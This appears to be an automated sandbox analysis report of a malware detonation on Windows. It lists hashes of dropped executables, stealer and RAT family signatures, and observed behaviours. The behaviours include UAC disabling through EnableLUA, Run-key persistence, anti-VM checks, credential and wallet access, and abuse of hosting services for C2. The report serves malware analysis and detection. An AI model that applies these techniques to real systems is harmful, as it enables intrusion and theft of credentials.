| SHA1 | cf4df97e65bc8a17eefca9d384f55f19fb50602f |
| SHA256 | 848260ba966228c4db251cfbcc0e02d6ca70523a86b56e5c21f55098cec92479 |
| SHA512 | 986e7354d758523ae4f4c2f38e4b8f629dbeeaba4b60bfd919d85139e8d8c29c0489989deab6e33022d6a744bdd93ce7c8e687036c5c4af63cce6e6f6e8bd0ad |
C:\Users\Admin\AppData\Local\Temp\Files\f86nrrc6.exe
| MD5 | 405189dd2992fa14910457e2870ce73e |
| SHA1 | 907512e238b326c32545a36da3061f5c07a9ac9d |
| SHA256 | 879eb020a578c492edcec1ed4b6675468779f9d0987f0008b7102df9d178cdfe |
| SHA512 | a509a134ff8b051e63a83ca8e3f7a890f203b1432235cc2a3320ee643a7983eaa447379a9672fba32bcf095fd429cfa46d405d8219e8de4d7c6bb3358cb3b584 |
C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe
| MD5 | 703bea610f53655fa0014b93f0fa4b7e |
| SHA1 | a3caccfaeffc6c6c39644404ad93455d37f0cdab |
| SHA256 | 1dac4bd2e15c7e98e3e8c657e9f6463f6d4f7d6a1256a3270649bfa5154c9e73 |
| SHA512 | 9d083a762a23c05e9a084a6424a0852725ed4fb010b074416228034c4bbbbfce2bcfc9cf3e9f24f719d768cf8204eade9d3dcaf4a414c79fcb4b4f5af4986aeb |
C:\Users\Admin\AppData\Local\Temp\Files\build11.exe
| MD5 | 2cb47309bb7dde63256835d5c872b2f9 |
| SHA1 | 8baa9effc09cf80b4a1bac1aa2aa92b38c812f1d |
| SHA256 | 18687a2ceebf3eda4a11a2ef0b1d85360d8837ad05c1b57f9f749ea06578848e |
| SHA512 | 3db4a42cbf6bc26d77320bf747e7244e54320b5e6ebf6a65bfd731beb7e99958bc5b7e9fe3ab1579becd42c588789c2185be74f143d120041b0331b316017104 |
C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe
| MD5 | 0f02da56dab4bc19fca05d6d93e74dcf |
| SHA1 | a809c7e9c3136b8030727f128004aa2c31edc7a9 |
| SHA256 | e1d0fe3bada7fdec17d7279e6294731e2684399905f05e5a3449ba14542b1379 |
| SHA512 | 522ec9042680a94a73cefa56e7902bacb166e23484f041c9e06dce033d3d16d13f7508f4d1e160c81198f61aa8c9a5aecfa62068150705ecf4803733f7e01ded |
C:\Users\Admin\AppData\Local\Temp\Files\stealc_default2.exe
| MD5 | 68a99cf42959dc6406af26e91d39f523 |
| SHA1 | f11db933a83400136dc992820f485e0b73f1b933 |
| SHA256 | c200ddb7b54f8fa4e3acb6671f5fa0a13d54bd41b978d13e336f0497f46244f3 |
| SHA512 | 7342073378d188912b3e7c6be498055ddf48f04c8def8e87c630c69294bcfd0802280babe8f86b88eaed40e983bcf054e527f457bb941c584b6ea54ad0f0aa75 |
C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe
| MD5 | d165b333fe9244a43967bc69c0b686cc |
| SHA1 | 58fbba484bdeeb020cc69a78218c897d28f7e2f2 |
| SHA256 | 01a2bb9f7591986b6eb3388699e7ce4a52b2686295b48dae0ec001639ba9f9b4 |
| SHA512 | 616556797aaad5deb2d5e8e8a70427d4e0b9ca4f64dd5976cdeaa3c6d8a37a612011e89b120a6ef2e1ef8a50d70483a71d8289a09952f612a9023d5f2922b580 |
C:\Users\Admin\AppData\Local\Temp\Files\file.exe
| MD5 | 13095aaded59fb08db07ecf6bc2387ef |
| SHA1 | 13466ec6545a05da5d8ea49a8ec6c56c4f9aa648 |
| SHA256 | 02b4e1709e79653e9569bf727301f92d4928726ba69d8d764db5841b94d63671 |
| SHA512 | fe10e40072e12c68edd3c3fcb9583253a4ee9fd7ec42f2a423829202abedf443c654968acb44919ad8ba3ecafa77c95b7fd2b8b641dd83779960363c0bb11bf0 |
C:\Users\Admin\AppData\Local\Temp\Files\main.exe
| MD5 | 9b3fafa68ef718b5b7bf3f1f46c698df |
| SHA1 | cd2de4a0a94d42c278bab73d29d716369ec644f4 |
| SHA256 | 2443d1fe25f8afbd5b9cd95fdb45e7c6c5b688e815f44f93158e534308d9f9fb |
| SHA512 | a8f180bdf01a59a36e69708420774c2a8607869f8c34ae1e0d40b8298db3b9d88efd0251aa3444b9cdbadad1bf6d8b9d61fb270a41be18f81b10a0505b1b1f28 |
C:\Users\Admin\AppData\Local\Temp\_MEI57282\certifi\cacert.pem
| MD5 | 50ea156b773e8803f6c1fe712f746cba |
| SHA1 | 2c68212e96605210eddf740291862bdf59398aef |
| SHA256 | 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47 |
| SHA512 | 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0 |
C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe
| MD5 | 2ca4bd5f5fece4e6def53720f2a7a9bb |
| SHA1 | 04b49bb6f0b9600782d091eaa5d54963ff6d7e10 |
| SHA256 | ab55d9b53f755a232a7968d7b5fcb6ca56fc0f59e72b1e60ab8624a0ee6be8c1 |
| SHA512 | 3e9e5c9793b4880990fbc8ab38f8a28b38a7493adb3ee1727e5ce0f8377348142705533f672356152a895694800c82517c71f2070c0dff08b73555214a165481 |
C:\Users\Admin\AppData\Local\Temp\login_db
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
| MD5 | aad42bb76a48e18ab273efef7548363d |
| SHA1 | 0b09fabe2a854ded0c5b9050341eb17ced9f4c09 |
| SHA256 | f75fbc05bbf3a9d9f9e2b67108f4d54eaf7582d10799385a5656b48ac10e86c6 |
| SHA512 | 5e58548ad6ff2a0237eea4d8a82695eab5031dca24a25c714f614b9e8fac0e90528cda0d80054f447288fcd9166e72729df32956784159b17ec378ae4278f216 |
C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe
| MD5 | 72a6fe522fd7466bf2e2ac9daf40a806 |
| SHA1 | b0164b9dfee039798191de85a96db7ac54538d02 |
| SHA256 | 771d0ba5b4f3b2d1c6d7a5ebe9b395e70e3d125540c28f1a0c1f80098c6775ce |
| SHA512 | b938a438e14458120316581cb1883579a2ce7f835b52f4ab1cde33aa85febcad11f8a8b0a23fb9a8acafa774fe9cbd1c804a02fd8e6f5d8df60924c351f0126e |
C:\Users\Admin\AppData\Local\Temp\Files\inlandsPom.exe
| MD5 | 6d36580feee622f41b2ab6bfe79a8f5e |
| SHA1 | 93e1cf1bb9ffa2d921d0402e6113ce50e6ed3bd7 |
| SHA256 | 3aa50555913747e4d6c5be45de96d771efea5f59251fd25a7746c0defcf12ba8 |
| SHA512 | 9c140cb14fd933f8f9d84d2331b6efbf99c1550a624e7cb26ab85b678d0f8b320fbad8a64e35a40111e10fa30c26f52439c06db59337b19a4df18f368d38117f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe
| MD5 | cee58644e824d57927fe73be837b1418 |
| SHA1 | 698d1a11ab58852be004fd4668a6f25371621976 |
| SHA256 | 4235c78ffaf12c4e584666da54cfc5dc56412235f5a2d313dcac07d1314dd52e |
| SHA512 | ab9e9083ed107b5600f802ec66dab71f1064377749b6c874f8ce6e9ce5b2718a1dc45372b883943a8eae99378d1151ce15983d4c9be67d559cd72b28b9f55fb5 |
C:\Users\Admin\AppData\Local\Temp\login_db
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe
| MD5 | 58e8b2eb19704c5a59350d4ff92e5ab6 |
| SHA1 | 171fc96dda05e7d275ec42840746258217d9caf0 |
| SHA256 | 07d4b7768e13d79ac5f05f81167b29bb6fbf97828a289d8d11eec38939846834 |
C:\Users\Admin\AppData\Local\Temp\cards_db
C:\Users\Admin\AppData\Local\Temp\TmpBC74.tmp
C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe
C:\Users\Admin\AppData\Local\Temp\Files\file1.exe
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\Pictures\32y9utl2g50WWog736V9uJlY.exe
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Temp\cards_db
C:\Users\Admin\tbtnds.dat
C:\Users\Admin\AppData\Local\Temp\1599224382.exe
C:\Users\Admin\AppData\Local\Temp\1549524169.exe
C:\Users\Admin\AppData\Local\Temp\1094014616.exe
C:\Users\Admin\AppData\Local\Temp\32903688.exe
C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe
C:\Users\Admin\AppData\Local\Temp\Files\server.exe
C:\Users\Admin\AppData\Local\Temp\Files\injector.exe
C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe
C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe
C:\Users\Admin\AppData\Local\Temp\Files\IadFRw%E2%80%AEfdp..exe
C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe
C:\Users\Admin\AppData\Local\Temp\Files\shell.exe
C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe
C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe
Analysis: behavioral2
Detonation Overview
| Field | Value |
| Submitted | 2024-12-12 18:19 |
| Reported | 2024-12-12 18:25 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 299s |
| Max time network | 300s |
| Command Line | |
Signatures
44Caliber
44Caliber family
Detect Umbral payload
Detect Xworm Payload
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
RMS
Rms family
Stealc
Stealc family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5492 created 1652 | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe |
| PID 6584 created 5340 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Umbral
Umbral family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\rascqn.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\qwex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
Credentials from Password Stores: Windows Credential Manager
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" | C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Checks installed software on the system
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
AutoIT Executable
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\11.reg | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rfusclient.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\MicrosoftProfile | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\xda | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rutserv.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\rutssvc64 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp | C:\Windows\system32\lsass.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
